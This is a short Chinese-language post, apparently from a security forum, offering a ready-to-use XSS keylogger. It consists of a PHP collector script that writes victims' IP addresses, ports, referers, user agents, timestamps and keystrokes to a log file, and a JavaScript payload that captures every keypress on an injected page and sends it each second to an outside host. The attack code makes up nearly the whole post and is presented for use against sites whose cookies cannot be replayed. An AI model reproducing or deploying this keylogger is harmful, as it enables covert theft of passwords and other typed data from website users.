XSS的键盘记录

 

XSS的键盘记录

这种方法是非常公开的,但很多人仍然不知道它。

cookie时,从目标不能重复使用,您可以使用此方法。 你需要一台主机上传:
 
g.php
 
<?php

$Keylog = $_GET["c"];

$reffer = $_SERVER['HTTP_REFERER'];

$ip = $_SERVER['REMOTE_ADDR'];

$date=date ("l dS of F Y h:i:s A"); 

$port = $_SERVER['REMOTE_PORT']; 

$user_agent = $_SERVER['HTTP_USER_AGENT'];

$file = fopen('data.txt', 'a');

fwrite($file, 'Ip: '.$ip."n");

fwrite($file, 'Port: '.$port."n");

fwrite($file, 'Refferer: '.$reffer."n");

fwrite($file, 'User Agent: '.$user_agent."n");

fwrite($file, 'Date: '.$date."n");

fwrite($file, $Keylog."n");

fwrite($file, "---------------------------nn");

fclose($file);

?>
 
 
 
 
k.js:
 
var keys='';

document.onkeypress = function(e) {

    get = window.event?event:e;

    key = get.keyCode?get.keyCode:get.charCode;

    key = String.fromCharCode(key);

    keys+=key;

}

window.setInterval(function(){

    new Image().src = 'http://www.96sec.org:88/jj.php?c='+keys;

    keys = '';

}, 1000);
 
 
成功利用后在当前路径下会生成一个data.txt的记录文件!

评论回复